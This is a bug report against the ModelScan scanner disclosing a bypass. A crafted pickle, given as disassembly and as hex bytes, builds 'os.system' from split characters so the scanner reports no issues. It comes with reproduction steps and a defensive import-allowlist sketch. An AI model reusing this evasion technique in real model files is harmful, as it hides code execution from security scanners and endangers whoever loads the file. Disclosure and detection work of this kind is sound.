[BUG] Security Vulnerability #331

@nier0x00

Describe the bug
Modelscan scanned a malicious pickle file using defaults and reported no issues.

To Reproduce
Steps to reproduce the behavior:
The disassembly of the malicious file looks like this:

    0: \x80 PROTO      4
    2: \x95 FRAME      240
   11: \x8c SHORT_BINUNICODE 'importlib'
   22: \x8c SHORT_BINUNICODE 'import_module'
   37: \x93 STACK_GLOBAL
   38: \x94 MEMOIZE    (as 0)
   39: \x8c SHORT_BINUNICODE 'builtins'
   49: \x85 TUPLE1
   50: R    REDUCE
   51: \x94 MEMOIZE    (as 1)
   52: \x8c SHORT_BINUNICODE 'builtins'
   62: \x8c SHORT_BINUNICODE 'getattr'
   71: \x93 STACK_GLOBAL
   72: \x94 MEMOIZE    (as 2)
   73: h    BINGET     2
   75: h    BINGET     1
   77: \x8c SHORT_BINUNICODE 'str'
   82: \x86 TUPLE2
   83: R    REDUCE
   84: \x8c SHORT_BINUNICODE 'join'
   90: \x86 TUPLE2
   91: R    REDUCE
   92: \x8c SHORT_BINUNICODE ''
   94: ]    EMPTY_LIST
   95: (    MARK
   96: \x8c     SHORT_BINUNICODE 'o'
   99: \x8c     SHORT_BINUNICODE 's'
  102: e        APPENDS    (MARK at 95)
  103: \x86 TUPLE2
  104: R    REDUCE
  105: \x94 MEMOIZE    (as 3)
  106: h    BINGET     2
  108: h    BINGET     2
  110: h    BINGET     1
  112: \x8c SHORT_BINUNICODE 'str'
  117: \x86 TUPLE2
  118: R    REDUCE
  119: \x8c SHORT_BINUNICODE 'join'
  125: \x86 TUPLE2
  126: R    REDUCE
  127: \x8c SHORT_BINUNICODE ''
  129: ]    EMPTY_LIST
  130: (    MARK
  131: \x8c     SHORT_BINUNICODE 's'
  134: \x8c     SHORT_BINUNICODE 'y'
  137: \x8c     SHORT_BINUNICODE 's'
  140: \x8c     SHORT_BINUNICODE 't'
  143: \x8c     SHORT_BINUNICODE 'e'
  146: \x8c     SHORT_BINUNICODE 'm'
  149: e        APPENDS    (MARK at 130)
  150: \x86 TUPLE2
  151: R    REDUCE
  152: \x94 MEMOIZE    (as 4)
  153: h    BINGET     2
  155: h    BINGET     2
  157: h    BINGET     1
  159: \x8c SHORT_BINUNICODE 'str'
  164: \x86 TUPLE2
  165: R    REDUCE
  166: \x8c SHORT_BINUNICODE 'join'
  172: \x86 TUPLE2
  173: R    REDUCE
  174: \x8c SHORT_BINUNICODE ''
  176: ]    EMPTY_LIST
  177: (    MARK
  178: \x8c     SHORT_BINUNICODE 'i'
  181: \x8c     SHORT_BINUNICODE 'd'
  184: e        APPENDS    (MARK at 177)
  185: \x86 TUPLE2
  186: R    REDUCE
  187: \x94 MEMOIZE    (as 5)
  188: h    BINGET     2
  190: h    BINGET     1
  192: \x8c SHORT_BINUNICODE 'getattr'
  201: \x86 TUPLE2
  202: R    REDUCE
  203: \x8c SHORT_BINUNICODE 'builtins'
  213: \x8c SHORT_BINUNICODE '__import__'
  225: \x93 STACK_GLOBAL
  226: \x94 MEMOIZE    (as 6)
  227: \x94 MEMOIZE    (as 7)
  228: h    BINGET     3
  230: \x85 TUPLE1
  231: R    REDUCE
  232: h    BINGET     4
  234: \x86 TUPLE2
  235: R    REDUCE
  236: h    BINGET     5
  238: \x85 TUPLE1
  239: R    REDUCE
  240: \x94 MEMOIZE    (as 8)
  241: \x8c SHORT_BINUNICODE 'gottem'
  249: \x94 MEMOIZE    (as 9)
  250: b    BUILD
  251: .    STOP
  1. Run echo "800495f0000000000000008c09696d706f72746c69628c0d696d706f72745f6d6f64756c6593948c086275696c74696e738552948c086275696c74696e738c07676574617474729394680268018c0373747286528c046a6f696e86528c005d288c016f8c0173658652946802680268018c0373747286528c046a6f696e86528c005d288c01738c01798c01738c01748c01658c016d658652946802680268018c0373747286528c046a6f696e86528c005d288c01698c016465865294680268018c076765746174747286528c086275696c74696e738c0a5f5f696d706f72745f5f939494680385526804865268058552948c06676f7474656d94622e" | xxd -r > str_concat_bypass.pkl
  2. Run python3 -m pickle str_concat_bypass.pkl and the output for the id command should be displayed in stdout.
  3. Run modelscan -p str_concat_bypass.pkl to see that no issues were found

Expected behavior
Modelscan reports the following on this file:

--- Summary ---

Total Issues: 2

Total Issues By Severity:

    - LOW: 0
    - MEDIUM: 0
    - HIGH: 0
    - CRITICAL: 2

--- Issues by Severity ---

--- CRITICAL ---

Unsafe operator found:
  - Severity: CRITICAL
  - Description: Use of unsafe operator '__import__' from module 'builtins'
  - Source: <path>/string_concat_bypass.pkl

Unsafe operator found:
  - Severity: CRITICAL
  - Description: Use of unsafe operator 'getattr' from module 'builtins'
  - Source: <path>/string_concat_bypass.pkl

However, os.system('id') is not caught, since this string is split up before it's merged using str.join.

Environment (please complete the following information):

  • OS: Debian Linux
  • Modelscan Version 0.8.7
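
Added example (not part of the original report and not modelscan's code): in the disassembly above, the only imports are `importlib.import_module`, `builtins.getattr` and `builtins.__import__`, and `os.system` never appears as a global, so a check keyed on that name has nothing to match. The sketch below lists a pickle's imports with `pickletools.genops`, without loading it, and compares a name denylist with an import allowlist. The function names, both lists and the `SAMPLE` bytes are assumptions constructed for illustration; the sample only joins two letters.

```python
import pickletools

# Assumption for this example: the only imports a model file may make.
ALLOWED_GLOBALS = {("collections", "OrderedDict"), ("builtins", "str")}
# A name denylist of the kind that split-and-join string building slips past.
DENIED_GLOBALS = {("os", "system"), ("posix", "system")}

STRING_OPS = {"SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE",
              "STRING", "BINSTRING", "SHORT_BINSTRING"}
GET_OPS = {"GET", "BINGET", "LONG_BINGET"}
PUT_OPS = {"PUT", "BINPUT", "LONG_BINPUT"}

# Constructed, harmless sample: str.join('', ['o', 'k']) reached through getattr.
SAMPLE = (b"\x80\x04"                    # PROTO 4
          b"\x8c\x08builtins\x94"        # 'builtins', MEMOIZE (as 0)
          b"\x8c\x07getattr\x93"         # 'getattr', STACK_GLOBAL
          b"h\x00\x8c\x03str\x93"        # BINGET 0, 'str', STACK_GLOBAL
          b"\x8c\x04join\x86R"           # 'join', TUPLE2, REDUCE
          b"\x8c\x00](\x8c\x01o\x8c\x01ke\x86R.")  # '', ['o','k'], TUPLE2, REDUCE, STOP

def find_globals(data):
    """List every (module, name) the pickle imports; the pickle is never loaded."""
    found, memo, tail = [], {}, []  # tail: string value of each push, else None
    for op, arg, _pos in pickletools.genops(data):
        if op.name in STRING_OPS:
            tail.append(arg)
        elif op.name in GET_OPS:
            tail.append(memo.get(arg))
        elif op.name == "MEMOIZE":
            memo[len(memo)] = tail[-1] if tail else None
        elif op.name in PUT_OPS:
            memo[arg] = tail[-1] if tail else None
        elif op.name in ("GLOBAL", "INST"):
            found.append(tuple(arg.split(" ", 1)))
            tail.append(None)
        elif op.name == "STACK_GLOBAL":
            mod, name = tail[-2:] if len(tail) >= 2 else (None, None)
            # Operands that are not plain string constants fail closed as "?".
            found.append((mod or "?", name or "?"))
            tail.append(None)
        else:
            tail.append(None)
    return found

def denylist_hits(data):
    return [g for g in find_globals(data) if g in DENIED_GLOBALS]

def allowlist_violations(data):
    return [g for g in find_globals(data) if g not in ALLOWED_GLOBALS]
```

On `SAMPLE`, `denylist_hits` returns nothing while `allowlist_violations` returns `builtins.getattr`, the attribute-lookup primitive whose arguments are only known at load time.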
